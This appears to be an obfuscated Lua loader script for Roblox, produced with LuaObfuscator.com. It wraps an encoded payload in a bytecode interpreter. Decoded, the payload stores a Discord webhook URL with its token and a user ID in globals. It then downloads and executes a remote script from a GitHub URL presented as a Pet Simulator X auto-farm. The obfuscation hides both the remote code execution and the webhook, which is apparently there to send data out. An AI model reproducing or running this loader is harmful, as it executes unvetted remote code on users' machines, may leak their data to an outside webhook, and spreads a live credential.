--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v48=0;local v49;local v50;local v51;local v52;local v53;local v54;local v55;local v56;while true do if (v48~=(11 -8)) then else v55=nil;v56=nil;v48=4;end if (v48==4) then while true do if (v49==2) then local v101=0;while true do if (v101==(53 -(23 + 29))) then v49=271 -(25 + 243) ;break;end if (v101==0) then v54=nil;v55=nil;v101=1 -0 ;end end end if (v49~=0) then else local v102=982 -(323 + 659) ;while true do if (v102==1) then v49=236 -(212 + 23) ;break;end if (v102~=(0 + 0)) then else v50=0;v51=nil;v102=1;end end end if (v49~=(4 -1)) then else v56=nil;while true do local v108=0 + 0 ;local v109;while true do if (v108==(0 -0)) then v109=0;while true do if (v109~=1) then else if (v50~=(1 + 0)) then else local v116=0 -0 ;while true do if ((0 -0)==v116) then v54={v51,v52,nil,v53};v55=v33();v116=940 -(581 + 358) ;end if (v116~=1) then else v56={};v50=2;break;end end end if (v50==(4 -1)) then local v117=0 + 0 ;while true do if (v117~=0) then else local v120=0;while true do if (v120~=1) then else v117=1 -0 ;break;end if ((1325 -(558 + 767))~=v120) then else for v144=1,v33() do v52[v144-(1 -0) ]=v38();end for v146=1,v33() do v53[v146]=v33();end v120=1 -0 ;end end end if (v117~=1) then else return v54;end end end break;end if (v109~=(0 -0)) then else local v115=0;while true do if (v115~=(1026 -(269 + 756))) then else v109=1;break;end if (v115==(0 -0)) then if (v50~=0) then else local v121=0 + 0 ;while true do if (1~=v121) then else v53={};v50=4 -3 ;break;end if (v121==(0 -0)) then v51={};v52={};v121=1;end end end if (v50==2) then local v122=0 + 0 ;local v123;while true do if (v122==0) then v123=263 -(12 + 251) ;while true do if ((1 + 0)==v123) then for v153=51 -(23 + 27) ,v33() do local v154=0;local v155;local v156;while true do if (v154~=0) then else local v171=0 + 0 ;while true do if (0~=v171) then else v155=0;v156=nil;v171=1;end if (v171~=(3 -2)) then else v154=1 + 0 ;break;end end end if (v154~=(174 -(81 + 92))) then else while true do if (v155~=0) then else v156=v31();if (v30(v156,1 + 0 ,3 -2 )~=0) then else local v177=0;local v178;local v179;local v180;local v181;while true do if (v177~=2) then else while true do if (v178~=(10 -7)) then else if (v30(v180,3,7 -4 )==(658 -(299 + 358))) then v181[17 -13 ]=v56[v181[2 + 2 ]];end v51[v153]=v181;break;end if ((0 -0)==v178) then local v187=268 -(62 + 206) ;local v188;while true do if (v187==(0 + 0)) then v188=0 -0 ;while true do if (v188~=0) then else v179=v30(v156,1535 -(1023 + 510) ,50 -(22 + 25) );v180=v30(v156,10 -6 ,6);v188=178 -(39 + 138) ;end if (v188==(3 -2)) then v178=1;break;end end break;end end end if (1~=v178) then else v181={v32(),v32(),nil,nil};if (v179==0) then local v192=0;local v193;local v194;local v195;while true do if (v192~=(1 + 0)) then else v195=nil;while true do if (v193~=(1 + 0)) then else while true do if (v194==(0 -0)) then v195=0;while true do if (v195==0) then v181[11 -8 ]=v32();v181[527 -(221 + 302) ]=v32();break;end end break;end end break;end if (v193==(1367 -(499 + 868))) then local v203=0;while true do if ((0 -0)==v203) then v194=0 + 0 ;v195=nil;v203=2 -1 ;end if ((350 -(272 + 77))~=v203) then else v193=1;break;end end end end break;end if (v192~=(0 -0)) then else v193=0;v194=nil;v192=1 + 0 ;end end elseif (v179==1) then v181[3]=v33();elseif (v179==(346 -(203 + 141))) then v181[3]=v33() -((1490 -(277 + 1211))^(8 + 8)) ;elseif (v179~=(1 + 2)) then else local v204=1192 -(361 + 831) ;local v205;local v206;while true do if (v204~=(1 + 0)) then else while true do if (v205==(83 -(28 + 55))) then v206=0;while true do if (v206==(0 -0)) then v181[3]=v33() -((2 -0)^16) ;v181[3 + 1 ]=v32();break;end end break;end end break;end if (v204~=0) then else v205=0 -0 ;v206=nil;v204=1;end end end v178=1 + 1 ;end if (v178==(13 -(4 + 7))) then local v189=0 -0 ;while true do if (v189==(1287 -(578 + 708))) then v178=3;break;end if (v189==0) then if (v30(v180,1 + 0 ,1)==1) then v181[781 -(328 + 451) ]=v56[v181[7 -5 ]];end if (v30(v180,2,2 + 0 )~=1) then else v181[1300 -(266 + 1031) ]=v56[v181[3 -0 ]];end v189=1;end end end end break;end if (v177==0) then v178=0;v179=nil;v177=1;end if (v177~=1) then else v180=nil;v181=nil;v177=2 + 0 ;end end end break;end end break;end end end v50=3;break;end if (v123~=(0 + 0)) then else for v157=1 + 0 ,v55 do local v158=0;local v159;local v160;local v161;local v162;while true do if (v158~=(1 -0)) then else v161=nil;v162=nil;v158=2 + 0 ;end if (v158==(0 -0)) then v159=0 -0 ;v160=nil;v158=1 -0 ;end if (v158==2) then while true do if (v159==1) then v162=nil;while true do if (1==v160) then if (v161==(2 -1)) then v162=v31()~=0 ;elseif (v161==2) then v162=v34();elseif (v161~=(12 -9)) then else v162=v35();end v56[v157]=v162;break;end if (v160==0) then local v183=0 + 0 ;local v184;local v185;while true do if (v183~=1) then else while true do if (v184==(1945 -(1796 + 149))) then v185=0 + 0 ;while true do if (v185~=0) then else local v197=0;while true do if (v197==1) then v185=1 + 0 ;break;end if (v197~=0) then else v161=v31();v162=nil;v197=1;end end end if (v185==1) then v160=1235 -(1101 + 133) ;break;end end break;end end break;end if (v183==0) then v184=0;v185=nil;v183=1;end end end end break;end if (v159==(1704 -(52 + 1652))) then local v174=1936 -(1894 + 42) ;while true do if (v174~=1) then else v159=3 -2 ;break;end if (v174~=0) then else v160=0;v161=nil;v174=1;end end end end break;end end end v54[2 + 1 ]=v31();v123=1;end end break;end end end v115=4 -3 ;end end end end break;end end end break;end if (v49==1) then local v103=0;while true do if (v103==(2 -1)) then v49=1 + 1 ;break;end if (v103~=0) then else v52=nil;v53=nil;v103=1 + 0 ;end end end end break;end if (v48==2) then v53=nil;v54=nil;v48=3;end if (v48==(1792 -(402 + 1389))) then v51=nil;v52=nil;v48=1490 -(545 + 943) ;end if ((0 -0)~=v48) then else v49=0;v50=nil;v48=1;end end end;v27=5;end if (v27==5) then v39=nil;v39=function(v40,v41,v42)local v57=v40[1];local v58=v40[2];local v59=v40[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (1==v78) then v81={...};v82=v13("#",...) -1 ;v78=2;end if (v78==2) then v83=nil;v83=function()local v90=v57;local v91=v58;local v92=v59;local v93=v37;local v94={};local v95={};local v96={};for v104=951 -(177 + 774) ,v82 do if (((5563 -(27 + 582))>(5931 -(833 + 409))) and (v104>=v92)) then v94[v104-v92 ]=v81[v104 + (1059 -(63 + 85 + 910)) ];else v96[v104]=v81[v104 + 1 + 0 ];end end local v97=(v82-v92) + 1 ;local v98;local v99;while true do local v105=0 -(0 -0) ;local v106;while true do if (((181 + 10)<=(5125 -(969 + 810))) and ((0 -0)==v105)) then v106=383 -(137 + 246) ;while true do if (((1181 -(399 + 534))<(4985 -1000)) and (v106==(3 -2))) then if ((4057>=(12 + 2100)) and (v99<=3)) then if (((3988 -2114)<(8849 -4338)) and (v99<=(1420 -(965 + 454)))) then if ((4149>(409 + (1129 -(31 + 50)))) and (v99==0)) then local v124=(0 -0) -0 ;local v125;local v126;while true do if ((v124==1) or ((11134 -7572)==(11776 -9419))) then while true do if ((1367<=(3920 -(368 + 342))) and (v125==(1096 -(918 + (464 -286))))) then v126=v98[1778 -(1638 + 138) ];v96[v126]=v96[v126](v14(v96,v126 + (1050 -(306 + 743)) ,v80));break;end end break;end if ((v124==(0 + 0)) or ((3921 -(410 + (103 -75)))<=((7902 -2572) -2469))) then v125=402 -(284 + 118) ;v126=nil;v124=1;end end else v96[v98[2]]=v98[3];end elseif (((315 + 527)==(2199 -(486 + 871))) and (v99==(1 + 1))) then local v129=0 + 0 ;local v130;local v131;local v132;local v133;local v134;while true do if ((v129==2) or (1614>=(10591 -5806))) then v134=nil;while true do if (((2685 -(309 + 42))>=(795 -408)) and (v130==(0 + 0))) then local v151=1764 -(1262 + 502) ;while true do if (((3814 -1175)<=(4379 -(354 + 205))) and (v151==1)) then v130=1 + 0 ;break;end if ((2813<(5075 -(387 + 620 + 338))) and (v151==(0 + 0))) then v131=v98[266 -(115 + 149) ];v132,v133=v93(v96[v131](v14(v96,v131 + (1557 -(343 + 1213)) ,v98[4 -1 ])));v151=1;end end end if ((3299>(2430 -(609 + (2037 -(856 + 802))))) and (v130==(4 -(3 -1)))) then for v163=v131,v80 do local v164=465 -(283 + 182) ;local v165;while true do if ((((6452 -(1260 + 403)) -2056)>(5861 -4082)) and ((0 -0)==v164)) then v165=0 + 0 ;while true do if (((2501 -(300 + 1039))<=2887) and (v165==0)) then v134=v134 + (2 -1) ;v96[v163]=v132[v134];break;end end break;end end end break;end if (((1 + 0)==v130) or (2309>=(5219 -(162 + 129)))) then local v152=0 + 0 ;while true do if (((2 -1)==v152) or ((9268 -7266)>(4551 -(853 + (1603 -(504 + 290)))))) then v130=5 -3 ;break;end if ((v152==(0 + 0)) or (2230>4210)) then v80=(v133 + v131) -(1 + 0) ;v134=0 + 0 ;v152=616 -(66 + 549) ;end end end end break;end if (((1394 -(658 + 527))<=4086) and (v129==(0 -0))) then v130=0;v131=nil;v129=(3 -2) -(0 -0) ;end if ((v129==(1 + 0)) or ((487 + 1279 + 772)<=(5652 -3864))) then v132=nil;v133=nil;v129=1323 -(807 + 514) ;end end else v96[v98[(5 -3) -0 ]]();end elseif ((v99<=(1 + 4)) or (1016>((152 + 5880) -(784 + (1311 -(224 + 420)))))) then if ((v99>(2 + 2)) or (3438>=(2767 + 1512))) then v96[v98[3 -(1 + 0) ]]=v42[v98[3]];else v96[v98[8 -(6 + 0) ]]=v98[411 -(178 + 230) ]~=(0 -(0 + 0)) ;end elseif ((v99<=(2 + 4)) or ((5184 -(994 + 938))<=(11436 -8349))) then do return;end elseif ((3599==((395 + 5153) -(493 + 1456))) and (v99>(745 -(429 + 309)))) then local v138=(1023 -(163 + 860)) -0 ;local v139;local v140;local v141;while true do if ((1649>=624) and (v138==1)) then v141=nil;while true do if ((v139==0) or ((430 + 613)<=(1163 -(30 + 113 + 708)))) then local v166=(543 -(20 + 523)) + (0 -0) ;while true do if ((v166==(0 + 0)) or ((3374 -((1585 -(1361 + 20)) + 846))>=(5053 -(944 + 769)))) then v140=v98[945 -(494 + 449) ];v141=v96[v98[4 -1 ]];v166=812 -(683 + 128) ;end if ((v166==(1 -0)) or ((240 + 3002)>((39378 -25496) -9431))) then v139=2 -1 ;break;end end end if ((v139==(1801 -((1860 -710) + 650))) or ((4519 -1401)<=(1797 -(56 + 248)))) then v96[v140 + (2 -1) ]=v141;v96[v140]=v141[v98[13 -9 ]];break;end end break;end if ((v138==(0 -0)) or ((1620 -(373 + 956))==((6128 -(505 + 699)) -(307 + 1302)))) then v139=302 -(156 + 146) ;v140=nil;v138=315 -(270 + (269 -(214 + 11))) ;end end else v96[v98[5 -3 ]][v98[662 -(309 + 274 + 76) ]]=v98[216 -((1646 -(1247 + 216)) + 29) ];end v79=v79 + (1523 -(1377 + (1558 -(56 + 1357)))) ;break;end if ((v106==(0 + 0)) or (4595==(4578 -(224 + 83)))) then local v114=0 + 0 ;while true do if ((690<=(2055 -846)) and (v114==(1 -0))) then v106=427 -(261 + 165) ;break;end if (((2063 + 669)==(4519 -(1120 + 667))) and (v114==(1566 -(805 + 761)))) then v98=v90[v79];v99=v98[874 -(633 + 240) ];v114=314 -(222 + 91) ;end end end end break;end end end end;v78=3;end if (v78==0) then v79=1;v80= -1;v78=1;end if (v78==3) then A,B=v37(v12(v83));if  not A[1] then local v107=v40[4][v79] or "?" ;error("Script error at ["   .. v107   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end end end;end;return v39(v38(),{},v26)(...);end if (3==v27) then v34=function()local v60=0 + 0 ;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v60==(119 -(71 + 46))) then v65=v30(v62,21,7 + (1892 -(43 + 1825)) );v66=((v30(v62,10 + 22 )==(2 -1)) and  -(938 -(854 + 83))) or (1082 -(994 + 51 + 36)) ;v60=1 + (1129 -(511 + 616)) ;end if (v60==(9 -(1494 -(59 + 1429)))) then if (v65==0) then if (v64==(0 -(0 -0))) then return v66 * (0 -0) ;else v65=1 + 0 ;v63=0 -(0 + 0) ;end elseif (v65==(7007 -4960)) then return ((v64==(793 -(618 + 175))) and (v66 * (1/(0 + 0)))) or (v66 * NaN) ;end return v9(v66,v65-(52 + 971) ) * (v63 + (v64/((2 -0)^(1573 -(620 + 901))))) ;end if (v60==(166 -(162 + 4))) then v61=v33();v62=v33();v60=(2 -1) -0 ;end if (v60==(1 + 0)) then v63=135 -(46 + 88) ;v64=(v30(v62,(3914 -2336) -(363 + 1214) ,(1421 -(243 + 4)) -(1021 + 133) ) * ((8 -6)^(20 + 12))) + v61 ;v60=931 -((1400 -1009) + 538) ;end end end;v35=nil;v35=function(v43)local v67=0;local v68;local v69;while true do if (v67==1) then v68=v4(v25,v28,(v28 + v43) -((812 -(324 + 487)) + 0) );v28=v28 + v43 ;v67=2 + 0 ;end if (v67==(9 -7)) then v69={};for v87=4 -3 , #v68 do v69[v87]=v3(v2(v4(v68,v87,v87)));end v67=3 + 0 ;end if (v67==(4 -1)) then return v7(v69);end if (v67==(0 + 0)) then v68=nil;if  not v43 then local v100=0 + 0 ;while true do if (v100==((308 -(221 + 87)) -0)) then v43=v33();if (v43==(545 -(359 + 186))) then return "";end break;end end end v67=1 + 0 ;end end end;v36=v33;v27=4;end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v44)if (v2(v44,2)==79) then v29=v1(v4(v44,1,1));return "";else local v84=v3(v1(v44,16));if v29 then local v89=v6(v84,v29);v29=nil;return v89;else return v84;end end end);v30=nil;v27=1;end if (v27==2) then v32=function()local v70,v71=v2(v25,v28,v28 + (226 -(174 + 50)) );v28=v28 + 2 + 0 ;return (v71 * (2102 -(1754 + 92))) + v70 ;end;v33=nil;v33=function()local v72=0 + 0 ;local v73;local v74;local v75;local v76;while true do if (v72==1) then return (v76 * (40120825 -23343609)) + (v75 * ((20886 + 46540) -(965 + 925))) + (v74 * 256) + v73 ;end if (v72==(0 + (557 -(281 + 276)))) then v73,v74,v75,v76=v2(v25,v28,v28 + 3 );v28=v28 + 4 + 0 ;v72=1 + 0 ;end end end;v34=nil;v27=3;end if (v27==1) then v30=function(v45,v46,v47)if v47 then local v85=(v45/((1760 -(1693 + 65))^(v46-(452 -(194 + 257)))))%((5 -3)^(((v47-(1107 -(356 + 750))) -(v46-(1 + 0))) + (406 -(48 + 357)))) ;return v85-(v85%(395 -(203 + 191))) ;else local v86=2^(v46-((42 + 109) -(74 + 76))) ;return (((v45%(v86 + v86))>=v86) and 1) or (0 + 0) ;end end;v31=nil;v31=function()local v77=v2(v25,v28,v28);v28=v28 + 1 ;return v77;end;v32=nil;v27=2;end end end;v16("LOL!093O0003023O005F4703063O00557365724944022O004046320AE24103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130382O3438392O38313539353639353231342F5A656F2O526166736B47634E6E506877375556443739627A6646437A38775749546266426C643075736A746266644F305874355758543572357661776252424A42704670030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403513O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F72584175746F4661726D2F6D61696E2F48617374654661726D2E6C7561000D3O0012053O00013O0030073O000200030012053O00013O0030073O000400050012053O00063O001205000100073O002008000100010008001201000300094O0004000400014O0002000100049O0000022O00033O000100012O00063O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v10(),...);break;end if (3==v0) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end end end